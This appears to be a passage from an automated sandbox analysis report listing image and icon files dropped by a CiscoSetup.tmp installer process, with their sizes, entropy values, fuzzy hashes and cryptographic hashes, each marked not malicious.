                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uTeKIu+Nxu1/eEefaoIgGSw78i5GJssnezz3Gu5cMrvF6AO:uTeg+NkdeCodGSiV3dcI96AO
                                                                                                                                                                                                  MD5:7DADB01AC22B7AB6F313726AD5977675
                                                                                                                                                                                                  SHA1:274554CDEB3971D3A9250AA0A7597F8B41D17000
                                                                                                                                                                                                  SHA-256:EBBA9313774314E18ABB4F4342B1C0C93DF22DD45146C6E84A08EB39BD419825
                                                                                                                                                                                                  SHA-512:C77FA7F8791A4852DBA2C9402D705E6C4CDB92DAAF71CD5F46EA8AD6EA35E41D4CFF42296C2F08133A82AE1F31DCA05C61B29AC291F85BBE4C7FDF088A4F0866
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2274
                                                                                                                                                                                                  Entropy (8bit):7.88487369762579
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ANENb8K8isarhoHup4l7Hn5MPuvW5LApZJ+WoXY:Bbx3rGHupubC6NpzSXY
                                                                                                                                                                                                  MD5:02AA7BFBC5519A9410E0D27732A6A163
                                                                                                                                                                                                  SHA1:9DDE546C6090CA4BD8BE58F8625A6AE25D440E6E
                                                                                                                                                                                                  SHA-256:B08A8AE17D62E9CF9D6E91E59955AF91E1B126FD82BC1071BDAFEE8AB6818253
                                                                                                                                                                                                  SHA-512:323777E1ABC44F643AD6AE581970D551D6BB94DF485377E91DB411ED8B839C47F8490002DF9756AD340BC19D8676050A620A1008F211B3AC32C39BE37CD35093
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                  Entropy (8bit):6.344520469543007
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPqJsXTSgECFg9ZA3teRaCCgqMtK+ywsl3DF1bp:6v/7hXeBOgIYawtvyx3/1
                                                                                                                                                                                                  MD5:DA395D5499E3403BC29899F8ED09E0F4
                                                                                                                                                                                                  SHA1:A6806BF5F7B2B0E1DDB705E2DBDF761E704738CD
                                                                                                                                                                                                  SHA-256:E72F87D5171DCD847C6A5994471B97339C4595E0C55591B1641227B56DB02041
                                                                                                                                                                                                  SHA-512:FEF71C2D806F506CD67B3338484C0B100989135012E72B321287C662AD65BD9120B210270D0B023F76FCAFD23237E9EDEDD5987E6B4D3731B9776B2EB338FE18
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1601
                                                                                                                                                                                                  Entropy (8bit):6.020486157649533
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNAG+ojoyMmcI1VYj41jCw1jaPl3VYjJoUHH3yG3:g/6G6GknA9Wg2O0y/c0CKum23CuUHiWV
                                                                                                                                                                                                  MD5:F999F81B91475C98DE33D66E186DF2CA
                                                                                                                                                                                                  SHA1:397B889C5AA95A25FFBD128656BE5D91A71F3275
                                                                                                                                                                                                  SHA-256:F807E26DA3A4BBFBD9552D2D50FB0F5FC28AAC46635470E3F834C2042C05310B
                                                                                                                                                                                                  SHA-512:2A43CB4EFC414F8FAE4EA173FB53CF2819975C76170DCEE4A995B3A74786C167C26DF258E1E589ECD92DECB999683EA38C6C4882CC2E299313C9357080521844
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1601
                                                                                                                                                                                                  Entropy (8bit):6.01754566314674
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:g/6G6GknA9Wg2A/c0glTl3clp3glfHiucV:gSuknmWg2A/qlTlslelfHiucV
                                                                                                                                                                                                  MD5:1F1425233D56C7381E8A1B9544656A3F
                                                                                                                                                                                                  SHA1:13DA3D280A4561F9018BFDF2C55396862B42C3BE
                                                                                                                                                                                                  SHA-256:FD348FEFE62E962AD34D03B3639E850AAEDCEAD2585311F8F665EFFF9319A6BA
                                                                                                                                                                                                  SHA-512:ACEC3FD68209F5AF45FC0736ECD9DB2441E69BD0A0DC43C45CEF2529BDC14B4D4A41696C0BED6E11876F066E137D29E270866FE86F3A20FC4CB9F09BA0EFE0AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1577
                                                                                                                                                                                                  Entropy (8bit):5.942243839150427
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNA6h+REMmcI1VCnw7Pl3Vv7aHH3yGNbBg:g/6G6GknA9Wg26x/c0eG3tmHiGg
                                                                                                                                                                                                  MD5:8675E6CF868FCE7270D170D83CE58757
                                                                                                                                                                                                  SHA1:B08567ACEF2380521759E4A1C12B1C9FE657ABED
                                                                                                                                                                                                  SHA-256:593A68E8FC7ADF787E5728D044AC71D4A9BEC6E4A6BF15895ABC8C4869F33625
                                                                                                                                                                                                  SHA-512:6480B3304656ECA345326A96FEF93B653B9F40550E5B0D14498B2670BAFB497E78A2517911F8E791E1DEC3C9A3070CB4212DB727FBE3FC648F6100E5EF349B2F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12068
                                                                                                                                                                                                  Entropy (8bit):7.961027992023309
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ukEiqZZQXKSmwL4v9UIqsQ8Dfn0Mv2RYkTONqT0oHrkbthyZpLpXrCAfrdag8csp:uViqZZQXKSmwL4VXJhsYOTynyZpNmAjE
                                                                                                                                                                                                  MD5:7E7FE0627B08E07FEE4ED11C41A9BA59
                                                                                                                                                                                                  SHA1:E3C6036975AD146D70AE76158EEBD3D8109B0C7F
                                                                                                                                                                                                  SHA-256:019183BF0C9A25E37A7EB74ABB3DC7848C1A729BBDA1F557E26A5322DBAF11E2
                                                                                                                                                                                                  SHA-512:30E68B932388A840F92D45AA97C3B9CC012C28F36DE93D315B107C7223DCBFBF94A54A09492E930642555828FCB3F6CA519F75BE6EA451DFF7B1D2F5B8FA2472
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2531
                                                                                                                                                                                                  Entropy (8bit):7.8827223365027725
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:PajMqdGnKe/dujhrZicEFhViZIs2sJ69y+10zTECChhrHxgpj:PaIqcnKeKZHg7by+ezTLUhrR+j
                                                                                                                                                                                                  MD5:2EA165B23D882176DAAD7C368EE24642
                                                                                                                                                                                                  SHA1:A46B746D76A41D4B322552BE4D66E9FAC66D7C19
                                                                                                                                                                                                  SHA-256:5B0F218A1EDB9CE79C15E8278557CCDB8AF44EAD52B4149CBC27DEF6FFE38619
                                                                                                                                                                                                  SHA-512:7C6C1F9FBDB726AF81551CB2CB790B847904E10AB90923A8FA43C34D617FD4A7F4B0A6FC85D327FA140D8C42197213F2A2BBB4643C16A1FC7DF17C1AF1E674FC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.4732129504366194
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:h6QRIHYm77Z5IVpIHwuS0g72HR1K9TEYkbGg2o:iHY0TUuUSHRAQXHx
                                                                                                                                                                                                  MD5:E61CF737A35E8DB52178528A0CBFE702
                                                                                                                                                                                                  SHA1:DE0A794D67A3DEF7079CEC7C48AC580CC71A7270
                                                                                                                                                                                                  SHA-256:559C518DC1F316C4991DC95D131CAB0BDAC445B1CE41B28EC8244CDD78F8AB2F
                                                                                                                                                                                                  SHA-512:8563013E9A2B75F5EDF00D71A292634FE375D5F6670F7F303C2CAB2DC271FDFC04A760417E2D487269D26611F6D236E6164EFC3179452AB34B1D42ABC17C51B6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):4.010961844615086
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:+9/hYGSEklnePwwDIr4LcARtTmOj/FrzFkT7goo:+9/CGShEPJcX87v
                                                                                                                                                                                                  MD5:393317DEF43F554C69A8ED63065E5BBE
                                                                                                                                                                                                  SHA1:09185B8B3C21C5CFB6661958665B6D997BF64E6F
                                                                                                                                                                                                  SHA-256:92ACFDA492B05FAA52BD32E9581F028BEE55F1C5AF617ACD8EE9E6985C9D1CBD
                                                                                                                                                                                                  SHA-512:9C7B0D37DA9080F27F0116F0C45AA5CD2D9480955433D60CCEE1555C0D930081655705C65565C7C18B766458530FA5B8DD641E7D2F8776BBB8650B7D3A95351C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3683
                                                                                                                                                                                                  Entropy (8bit):7.90204028759812
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTuU1G4X0vy:TSDS0tKg9E05TuGG4k6
                                                                                                                                                                                                  MD5:4D8816B117672123F84ECD051877A37D
                                                                                                                                                                                                  SHA1:C9983DE5E4DD52660A109C418DBDA7B7F202E2E8
                                                                                                                                                                                                  SHA-256:3D2A9058537240F9131F6A8D083A6723A0D45E31BF2BBA4EA761DE23948C8209
                                                                                                                                                                                                  SHA-512:63395803D1BED8B33E1854D6EC5EEF2322FFE69B5150CF414692D7AE8003ABA601FB283C8CB661ED4AD633B4ACF945AADC579A84910441963F8EE801D0CEB447
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4455
                                                                                                                                                                                                  Entropy (8bit):7.908038022091361
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTIaLT1ZWqwPFR34mH:TSDS0tKg9E05TBZWqqPH
                                                                                                                                                                                                  MD5:2E3C536FBC9DDA9D0DA7DD408FA3D69B
                                                                                                                                                                                                  SHA1:4056553645ACFD51D5BB1E74623ED9938C0F5717
                                                                                                                                                                                                  SHA-256:D86F0CEDDF46C275DF0FC6CF0FE70852DD270D0BC35355CC6B30CE7DDD6EC2B7
                                                                                                                                                                                                  SHA-512:AB3237097BBA665CC1B22F4A4C280C6141E8266EA9D4A569C3B53D4401E00F4E1E0F7944A172C16CDD455AF8EAF3EAA9FC43A08EFDFE7844689BFC7B4CB870F1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26674
                                                                                                                                                                                                  Entropy (8bit):7.935979285003627
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:YFyemvD4Gm3D6kkgmo+C24RkZErZWiTVCbFk:YryD4G+Dcgmo+C9kZsZWpFk
                                                                                                                                                                                                  MD5:B1655EC01B232A1A42E43F950321285A
                                                                                                                                                                                                  SHA1:F34C1F228C66BF4ED1B0E9901D3284EBD7A01600
                                                                                                                                                                                                  SHA-256:9E2447F1B7B4A3404C8D3588DAB59CF51635049BE4F1FC0D1BDEE77DEFFC5B47
                                                                                                                                                                                                  SHA-512:BCC1BC2AE795109EF83422613D9B0D9FF23EA81136479748FFA7CD7FC03D527B4744833728637F7892B5F60DD476F1F32122AECCCC26DB2D6092CD2346A750BA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28939
                                                                                                                                                                                                  Entropy (8bit):7.960017526195935
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:OkJC2FKvbdu0G3091/3+WVlQkJyE3MNLc37Wr65:FCQmc0390W0kT8ll8
                                                                                                                                                                                                  MD5:B52EAA7318111371B2B8EF3425AD4405
                                                                                                                                                                                                  SHA1:DB16F9570B55F8045FE8354ACC853655791557AA
                                                                                                                                                                                                  SHA-256:C33C036B94E3BD83D393E552CE87784BA9F74D2B8563162024DAF7ED05E7EF6D
                                                                                                                                                                                                  SHA-512:AA98F3130A76BCD5FAF093886472F1A937E93AD0A8E83C00F9675C14C7AFC5DF903C52DE64FBAD6012F5DF54A1DB56759481BA8516C0DB0A851B6BE87FD13DFF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29327
                                                                                                                                                                                                  Entropy (8bit):7.967732566337996
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:kfiUT6EuEADj9MKT8NYMSNQ0Ksn1GStodN2AG1:kfTGGYRKK1GStodNw
                                                                                                                                                                                                  MD5:A0FE71E2020412BD9FFEB2712628DAD0
                                                                                                                                                                                                  SHA1:33EBF21B46A1742A46DEEE2EADB0F714B4F64959
                                                                                                                                                                                                  SHA-256:3AF5729F9A5902B409FD0D79BA1B04AF2ABDB25BCB4750F235BD61DC2EEE7C77
                                                                                                                                                                                                  SHA-512:D4886F29044F3B6A1FB900AF1973362B6822085544ED65877B2F555B360E494912AAFFDA58E49C8A91ED541F9D18482A1811C9350074797416CC8ECD06CC1863
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31702
                                                                                                                                                                                                  Entropy (8bit):7.968827949628217
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:j9rxAm3IyJR5xmDQXMUg0HvpXOQFvgMN/2iHxr:j5X5AVUjEQ9NVRr
                                                                                                                                                                                                  MD5:D7A6605937F7BE6861ED243FEED7B2AF
                                                                                                                                                                                                  SHA1:CE9EFBCE4C470923C242615A0B53E775800BB031
                                                                                                                                                                                                  SHA-256:331F0FB3EAA0F38927DD0B350A6D92B8E18ACFDF64CBC597B470EF6E4D055C81
                                                                                                                                                                                                  SHA-512:A9C1C5503D9987245389C762ECDA0F4803BD84CC3D47534731F9194BB33DF93C7FEA6569D6E0BE03C4A59551B4F8021AA129A38FFF653FEB81B5DBF065438FCF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26026
                                                                                                                                                                                                  Entropy (8bit):7.927985837095832
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:TKQua9HUsr5RRxO5oEt9jwIZmYCEHme0KV:+Xa9RLxO5o29jNGEGk
                                                                                                                                                                                                  MD5:5DC7A6BEE91DE8331C802B1647F5AD10
                                                                                                                                                                                                  SHA1:D9F8150235EF917E6884AA963C292530AE7ED599
                                                                                                                                                                                                  SHA-256:4D9B3A95A941BD32E42171770195872958DB56A6C2CB6FAE664500E947911149
                                                                                                                                                                                                  SHA-512:BC32B66AD44C88DB95995B08A4A2E7D420035CC02318756AD10F854B884B613C8CEE3017E7708B7E4865B06961B7292CBD91B3091B0BC61889A71A06C5A17E98
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5803
                                                                                                                                                                                                  Entropy (8bit):7.950077949239442
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:eRHNludLinPdADSlBP/5X48lHE6uXPk1HFlQ0vmHSQON0hYRGRkA3rGWjrXM:UHNludLjM/FvhE8FlRRJG1r5jA
                                                                                                                                                                                                  MD5:1F00D2A16D3C303C76359276E6983553
                                                                                                                                                                                                  SHA1:9B58E65D2A01B1E55173370BBED7CFFB72C683D2
                                                                                                                                                                                                  SHA-256:F70F49DED3EB450D26AABC8F71AE8C1BF63D2C01A1C55C6A19E010FAD602011E
                                                                                                                                                                                                  SHA-512:C65A78144AB84A68DEFAB93704D20AB177E2BB82138FCD47171289D164F938D7D9620AEB22ABE234CDC79DE2CB28AF1A2B780845D873409DF0B89A60C34D425F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29723
                                                                                                                                                                                                  Entropy (8bit):7.971507308971378
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:f/oVoAjsba3qfpgr/jKyV8xonTTdZPNE/ZIeb4p82Xg:fwZ6tyHTTdERbkp8Mg
                                                                                                                                                                                                  MD5:DDF9FC987801BDE753D2C37733DE7F3D
                                                                                                                                                                                                  SHA1:BDA65E600F5EDD2889244E2C1CEAD37C1C292FC8
                                                                                                                                                                                                  SHA-256:D62A61171CAAD9B43DBCE2683DB87959B2C1FCB303D6B34A3DC1D178A9745F44
                                                                                                                                                                                                  SHA-512:D1C0451C3E9B52920A56EDF57CCF3617662E18B14E0E0B00A94D948574431C30E1C31BA2FF6F4BBFA8E01D42B00EA90FD03CD1D3991B3ACF04C5C9802F547244
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 67 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1264
                                                                                                                                                                                                  Entropy (8bit):7.787798189239225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:GblEbksH883ZKHGbOgt1NxI7aY1nigCC2OjKe6Yt3CvPTWngq2i3sTj85:ElEJH8I/NkQgQ+KtY1C3Sngq2VW
                                                                                                                                                                                                  MD5:DB2D5090354734EC085D88810B342866
                                                                                                                                                                                                  SHA1:F727BC14361A4332C73BFB5194CA5FF6EAC37959
                                                                                                                                                                                                  SHA-256:996C1A034CC8B6CA3C511E2C7EE2FED22F31904DB769A1AD8555F1CFD478AA62
                                                                                                                                                                                                  SHA-512:04F9B9B5EABD33E318F6A83A734ECA67C2778745560F44F45C535847BF642B33DB2C6C974CC7A6AAE4C68C67470135B15ABB2A77247BFF3C518EC113FDFD8888
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14308
                                                                                                                                                                                                  Entropy (8bit):7.981829207860698
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:XybKkbzXX5gnaVvNX5HqQiVAlwokisiMCb9sdP4++2SC7a1Rj2:XFyBr5KAworb9sB4Yi0
                                                                                                                                                                                                  MD5:1FC5657F3DDBAE57EA997277C9D6488A
                                                                                                                                                                                                  SHA1:2C4A261FEA797112FF95ABDB008435329BC8C048
                                                                                                                                                                                                  SHA-256:DC39DF1AECA15B0BAD3E15D05CE917D3CB7CB00C4F363BE67AC5741F82E5A57A
                                                                                                                                                                                                  SHA-512:CA37C34378244C91AC316717B1DFBA2E3D596918F9000710ECDF503728C2C207031F71224410CE661AADB59DB5272EF993A0826E96D311784F32BDE7BA125440
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13810
                                                                                                                                                                                                  Entropy (8bit):7.9753795366170355
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:9UvTt4Skm1eC/3ndqwLk01JZ1GUhDYLk6pb2IloPTCDnnd:9qeSXeC/7TYpb2jSnd
                                                                                                                                                                                                  MD5:276699732D96B797E30C6092A6B9A3C8
                                                                                                                                                                                                  SHA1:9430D64617EC4CAA2895D0755824E556568FDC70
                                                                                                                                                                                                  SHA-256:217DD0FA6E750A6E5E422744ED0650204519942130254825CBE87B16E5E5AAAD
                                                                                                                                                                                                  SHA-512:884D6A9A105697FD5F4F4032FA14C967826937D42E6B88FD6D8DECC3B03AE0296588CF1D093673765C16CD65872405F52986303DF2453D50DDCA6F540082DA0E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10811
                                                                                                                                                                                                  Entropy (8bit):7.9725003667897125
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:xGW6GZ0zrJJ+M0jTsGzV2jysFfqybOB4twma2iNrHbC4ussE84u:xMZUTsGirFioOBg49VvusV84u
                                                                                                                                                                                                  MD5:A805DED6582E8382AB22EAF761559ED7
                                                                                                                                                                                                  SHA1:2C5C4C718AFC5566FB5D6B458CAFB04AC96B6A13
                                                                                                                                                                                                  SHA-256:393968B4F0F62527169D0D3DB56D756DE094D6F91252536BCD08770B83C98446
                                                                                                                                                                                                  SHA-512:F47219CE8D631FB79BF9FF67D24B57253A5F56E2DF98A35C5769D84A101E6E6ADA66D2B2E1FA6B1141087060200F97E48EA01B99CBE9B81FFA727E76ABA07713
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13727
                                                                                                                                                                                                  Entropy (8bit):7.982847912604664
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:63aRGz9MobH6FYdTA1tjCtZPXq5Sc5Li2H2E:v29jH6FJ1YnyLii2E
                                                                                                                                                                                                  MD5:2DDF6BB80F9B33B219E448F37ED394C0
                                                                                                                                                                                                  SHA1:BD1D1397D9011D9CF81D1061095CEA39C81AEE56
                                                                                                                                                                                                  SHA-256:8CB70AAF7D9D0C98AF0E6C640A78A2D4CABA2DC3DA8876208AD9A617A6E7A226
                                                                                                                                                                                                  SHA-512:00E86EDC454CF26E50D8AEEDF2CBC031E79F609E280E27FA87381CE6C7F9F6A8611FFC6EB1075BE271F0E864EDAAE89FDB25502BCB34C66412B6504C370154CF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13633
                                                                                                                                                                                                  Entropy (8bit):7.975971786407776
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6MOtUX/uOlpyiGD809Mt039VytL65doCQc:1NWFl809Mt0j0Lap
                                                                                                                                                                                                  MD5:9C88E64458F50120E89167040B55A41C
                                                                                                                                                                                                  SHA1:8A43DFC4B9ED2CB460A024562405302468185A09
                                                                                                                                                                                                  SHA-256:E1E3C1C59B21F0F49EC9DB747C14760EC2068394F739A2E456F20A25E40AD24D
                                                                                                                                                                                                  SHA-512:7EACCCFC904D52AA13214757309858F4083F5CD8C06D6442F3C3F361A2AD01865C4A816240F3B87B63052F33AB96EB08F0C504A1CF0110C569D64350948B3BD8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10710
                                                                                                                                                                                                  Entropy (8bit):7.9641316394298025
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Aowo3FbryCXdxyG2En+b5eUJf1Q6pPZ3LxElBt/wVUuv04YKmECa:AowqbrvX3h1+b5eMdQDY3v0da
                                                                                                                                                                                                  MD5:5412237E7D26A5CB2F3F8891B9E36462
                                                                                                                                                                                                  SHA1:778ABA750AFD4D5518A5B7EDE1F73E7A016883C8
                                                                                                                                                                                                  SHA-256:288C513CA8875B4BC5DB6144D0C4215680F5BF3385DF05D6A8EC2896587DB6D3
